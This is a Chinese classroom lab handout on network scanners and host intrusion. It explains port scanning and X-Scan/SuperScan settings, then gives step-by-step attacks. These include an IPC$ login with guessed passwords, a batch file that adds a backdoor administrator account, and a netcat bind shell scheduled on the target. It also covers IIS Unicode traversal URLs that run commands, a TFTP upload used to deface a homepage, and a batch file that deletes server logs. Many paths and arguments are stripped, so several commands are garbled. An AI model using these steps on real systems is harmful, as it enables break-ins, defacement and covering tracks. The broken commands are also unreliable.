2024年3月26日发(作者:)

单元三 网络系统的安全配置与管理

项目五 网络安全扫描器及漏洞的入侵扫描

教学目标

1.了解安全扫描的的原理、作用和网络扫描工具X-scan、Superscan的主要原理;

2.熟练掌握X-Scan、Superscan扫描器的使用,实现屏幕监视和控制和远程执行命令;

3.掌握主机入侵方式及基于Unicode漏洞的入侵,提高计算机安全方面的安全隐患意识。

教学要求

1.认真听讲,专心操作, 操作规范, 认真记录实验过程,总结操作经验和写好实验报告,在实验中培

养严谨科学的实践操作习惯;

2.遵守学校的实验室纪律,注意人身和设备的安全操作,爱护实验设备、及时上缴作业;

3.教学环境: Windows 7以及Windows server2003/2008以上操作系统。

知识要点

1.了解安全扫描的的原理、作用;

2.理解网络扫描工具X-scan、Superscan的主要原理。 ;

技术要点

1.熟练掌握X-Scan、Superscan扫描器的使用,实现屏幕监视和控制和远程执行命令。

2.掌握主机入侵方式及基于Unicode漏洞的入侵,提高计算机安全方面的安全隐患意识。

技能训练

一.讲授与示范

正确启动计算机,在最后一个磁盘上建立以学号为名的文件夹,从指定的共享文件夹中将“实习指导书”

和其他内容复制到该文件夹中。

(一)安全扫描的原理

1.作用

1)自动检测远程或本地主机安全脆弱点的程序;

2)采用模拟攻击的形式对目标可能存在的已知安全漏洞进行逐项检查;

3)并不是一个直接的攻击网络漏洞的程序;

2.功能

发现一个主机和网络的能力;一旦发现一台主机,有发现什么服务正运行在这台主机上的能力;通过测

试这些服务,发现这些漏洞的能力。

(二)端口扫描

扫描器主要可分为基于主机的和基于网络的两种。

真正的扫描器是TCP端口扫描器,可以连通TCP/IP端口和服务(比如,Telnet或FTP),并记录目标的

回答,搜集到关于目标主机的有用信息。

1.TCP SYN 扫描

原理:扫描程序发送的SYN数据包,准备打开一个新的连接并等待反映:一个SYN|ACK的返回信息表示

端口处于侦听状态,一个RST 返回表示端口没有处于侦听状态。

优点:不会在目标计算机上留下纪录。

缺点:扫描程序必须要有root权限才能建立自己的SYN数据包。

2.TCP connect()扫描

原理:利用操作系统提供connect()系统调用,与每一个感兴趣的目标计算机的端口进行连接,若端口

处于侦听状态,那么connect()就能成功。

优点:系统中的任何用户都有权利使用这个调用;

缺点:很容易被发现,目标计算机的logs文件会显示一连串连接和连接出错的消息,并且很快将它关闭。

3.TCP FIN 扫描

原理:利用关闭的端口会用适当的RST来回复FIN数据包,而打开的端口会忽略对FIN数据包的回复。

优点:FIN数据包可以不惹任何麻烦的通过。

缺点:这种方法和系统的实现有一定的关系,有些系统不论是打开的或关闭的端口对FIN数据包都要给

以回复,这种情况下该方法就不实用了。

(三)扫描工具的应用

1.使用X-SCAN扫描局域网主机

1)原理

X-Scan采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能。扫描计算机的

端口、漏洞、某种服务、某个协议、系统密码,包括:远程服务类型、操作系统类型及版本,各种弱口令漏

洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等20多个大类。对于多数已知漏洞,给出了相应的

漏洞描述、解决方案及详细描述链接。

通过扫描结果,可以了解的看到系统哪方面可能出现风险,比如密码太弱或者黑客可利用的漏洞等,以

便即使采取措施对计算机系统进行加固。

2)X-Scan的使用

任务1 系统弱口令扫描

要求:利用X-Scan实现主机系统的是否存在NT弱口令(获取管理权限)

步骤:

① 系统安装及设置

下载X-Scan,并解压,运行xscan_,并且设置扫描地址

“设置” →“扫描参数” →指定IP范围:192.168.1.1-192.168.1.254。如图1所示:

② 设置NT-Server弱口令

全局设置 → 扫描模块 → 选择NT-Server等弱口令,如图2所示。

图 1

③ 并发扫描及扫描报告的设置

选择“并发扫描”,可以设置要扫描的最大并发主机数,和最大的并发线程数。

图 2

图3 图4

选择‘扫描报告’,点击后会显示在右边的窗格中,它会生成一个检测IP或域名的报告文件,同时报告

的文件类型可以有3种选择,分别是HTML、TXT、XML。

④ 其他设置及端口设置

有2种条件扫描:1,‘跳过没有响应的主机’,2,‘无条件扫描’,如图5。

设置没有响应的主机:全局设置 → 其他设置 → 选中“跳过没有响应的主机”及其他相关;

端口检测:插件设置 → 端口相关设置 → 待检测端口7,9,13,19,21,22,,20...→ 检测方式:SYN

图5 图6

‘端口相关设置’中可以自定义一些需要检测的端口。检测方式“TCP”、“SYN”两种,TCP方式容易被

对方发现,准确性要高一些,SYN则相反。 如图6所示。

⑤ SNMP相关设置

用来针对SNMP信息的一些检测设置,在监测主机数量不多的时候可以全选,如图7所示;

⑥ NETBIOS相关设置

WINDOWS系统的NETBIOS信息的检测设置,包括的项目有很多种,根据实际需要进行选择,如图8。

图7

⑦ 字典文件设置

是X-SCAN自带的一些用于破解远程账号所用的字典文件,这些字典都是简单或系统默认的账号等。

图8

图9

⑧ 开始扫描

图10

⑨ 扫描过程及扫描结果

扫描结束以后会自动弹出检测报告,包括漏洞的风险级别和详细的信息,以便我们对对方主机进行详细

的分析。

图11

生成扫描报告如图11所示。不同计算机扫描结果的报告存在差异。

2. superscan工具

1)功能

图 11

主要功能:检测一定范围内目标主机是否在线和端口开放情况,检测目标主机提供的各种服务,通过Ping

命令检验IP是否在线,进行IP与域名的转换等。

◆ 通过Ping来检验IP是否在线;

◆ IP和域名相互转换;

◆ 检验目标计算机提供的服务类别;

◆ 检验一定范围目标计算机的是否在线和端口情况;

◆ 工具自定义列表检验目标计算机是否在线和端口情况;

◆ 自定义要检验的端口,并可以保存为端口列表文件;

◆ 软件自带一个木马端口列表,通过这个列表我们可以检测目标计算机是否有木马;同时,

也可以自己定义修改这个木马端口列表。

2)Superscan应用实例

任务2 Superscan应用

要求:运用Superscan选项的设置实现扫描目标主机的各种信息

步骤:

① Superscan是无需安装,下在解压后可以直接使用。Superscan12的运行界面如下图所示。

图12 Supersca运行界面

② 在“开始IP”和“结束IP”:目标主机IP段,按“开始”:进行IP扫描,如下图13所示。

图13 IP段扫描实例

③ 选择“主机和服务扫描设置”可对目标主机信息反馈方式、TUP及UDP端口进行设置。如图14所示。

图14 主机和服务扫描设置窗口

④ 选择“工具”菜单命令,在“主机名/IP/URL”中输入目标主机的主机名、IP地址或者域名,然后选

择“查找主机名/IP”、“Ping”等图标按钮,能够获取目标主机的各种信息了。如下图所示。

图15 查找主机IP、Ping目标主机等

⑤ 选择“Windows枚举”菜单命令,在“主机名/IP/URL”中输入目标主机的主机名、IP地址或者域名,

然后选择需要枚举的类型,按“Enumerate”按钮,能够获取目标主机的各种枚举信息。如图16所示。

图16 对目标主机各种信息进行枚举

二.课堂任务实践

任务3 主机入侵方式

要求:多种方式实现对主机的入侵防范

步骤:

1)IPC$连接的建立与断开

可运用空连接远程目标主机的条件是获到目标主机管理员帐号和密码,同时关闭杀毒软件或防火墙。

① DOS命令窗口

前提:帐号是admin,密码是123456

net use $ "123456" /user:"admin" //成功

② 映射网络驱动器

net use z: $ //成功

打开“我的电脑”则多了一个Z盘,即为目标主机的C盘,查找Z盘的指定文件

③ 断开所有的IPC$连接

net use */del

net use 目标机地址ipc$del //删除指定主机

2〕建立后门帐号

① 编写BAT文件,内容为:

net use sysback 123456/add //帐号和密码

net localgroup administrators sysback /add

② 与目标主机建立IPC$连接

③ 复制文件到目标主机

copy $

实现文件拷贝到目标主机的D盘

④ 查看目标主机时间:

net time 192.168.1.X

⑤通过计划任务远程主机执行文件,根据目标机的时间往后推几分种执行:

at192.168.1.X 时间 d: 运行

net use */del 断开IPC$连接

⑥ 验证帐号sysback是否成功建立

net use $ "123456" /user:"sysback"

说明:若能建立连接则说明管理帐号“sysback”成功创建

3〕NC连接操作

用到的工具可以是:nc(打开后门程序),前提关闭杀毒软件(网上自行下载该工具)

① 建立空连接

格式:net use对方ipipc$“口令”/user:“用户名”

例:net use $ "123" /user:"administrator"

② 将后门程序(nc)拷贝到对方计算机

copy 对方ipadmin$system32

(拷贝到system32的原因:是环境变量path=c:winntsystem32;查看环境变量:我的电脑---属性--高

级--环境变量--系统环境变量---系统缺省下的路径%SystemRoot%system32;%SystemRoot%;)

例:copy c: 192.168.0.206admin$system32

③ 查看对方系统当前时间

格式:net time对方ip

例:net time192.168.0.208

④ 定时启动nc程序

根据第三步时间之后2,3分钟之后,定时在对方机子上启动nc程序:

例:at对方IP 10:00 -d -l -p 8082 -e

◆ -d:-l:-p:在8082端口上等待的连接;

◆ -e :以命令行方式运行) ;

◆ at对方IP:在自己机子上查看是否执行;

◆ at:在对方机子上查看是否执行;

⑤ 连接对方的8082端口

nc对方IP 8082

(检查是否连接对方:ipconfig看本地连接是否为对方IP;添加用户和组等)

⑥ 关闭对方计算机

Shutdown 对方IP T:20 (20秒后自动关闭对方计算机)

任务4 基于Unicode漏洞的入侵(IIS漏洞)

要求:使用Unicode编码实现网站“涂鸦”(目标系统windows2000)

步聚:

1)扫描远程服务器

运用X-scan扫描远程服务器,寻找有漏洞的主机

填好“指定IP范围”,在“全局设置”中“扫描模块”选择“漏洞检测脚本”后,进行扫描

2)制作标语

使用DreamWewaver制作一个标语网页,保存为,内容自定义。

3)远程服务器的根目录准定

IE地址输入:

目标ip地址/scripts/..%c0%2f../windows/system32/?/c+dir+c:/s

◆ /s加在dir目录命令后:表示查找指定文件或文件夹的物理路径

◆ dir+ c::表示在远程服务的C盘中查找文件,该文件在IIS默认安装中,若找到

即可找到WEB根目录。

◆ 编码为“%c1%1c”或“%e0%2f”

4)遍历根目录下的文件,涂鸦主页

1)漏洞检测,查找主页

◆ 手工检测

IE地址输入:

服务器IP地址/scripts/..%c0%2f../windows/system32/?/c+dir

+c:inetpubwwwroot

目标IP/scripts/..%c1%1c../winnt/system32/?/c+dir+c:inetpubwwwroot

主页名:,,,等

◆ 工具检测:

X-Scan检测该漏洞,通过扫描得到

/script/..%c1%1c../winnt/system32/?/c+dir

2)上传自制主页

下载Tftpd32工具,运行tftpd32服务器,只需将自制页面复制到tftpd服务器的路径下即可:

格式:Tftp[-i]host[GETPUT] soures[destination]

参数:-i二进制文件传输;host是Tftp服务器地址;get指下载文件;put指上传文件;Source指文

件名;Destination指目的地。

例:

目标ip地址/scripts/..%c0%2f../windows/system32/?/c

+tftp+本机ip+get++c:。

3)重新登录远程主机的网站,即为主页的内容

4.清除入侵信息

入侵者在利用unicode漏洞入侵后,在离开远程服务器前,需要清除服务器的日志文件。BAT文件:

del+C:winntsystem32logfiles*.*

del+C:winntsystem32config*.evt

del+C:winntsystem32dtclog*.*

del+C:winntsystem32*.log

del+C:winntsystem32*.txt

del+C:winnt*.txt

del+C:winnt*.log

操作:通过TFTP服务器把BAT文件上传至该服务器C:下,再通过unicode漏洞执行该BAT文件。但是,

由于通过unicode漏洞获得的权限很低,对绝大多数服务器,入侵者无法通过该漏洞对system32目录访问。

任务5 远程控制

要求:运用DamWare实现远程控制计算机

步骤:

见附件“项目35 任务5远程控制”。

三.课堂小结

1.本课的纪律评价。

2.实习操作情况分析及出现的常用操作强调。

3.提出要求:要积极参与,仔细理解,增加主动性,才能有所收获。

四.作业

要求:通过上网方式了解网络监听工具Wireshark和Nmap扫描工具的主要功能并能正确使用。

检查:下次课对本次课的内容进行评价或提问,效果好的在期末成绩上直接2-3分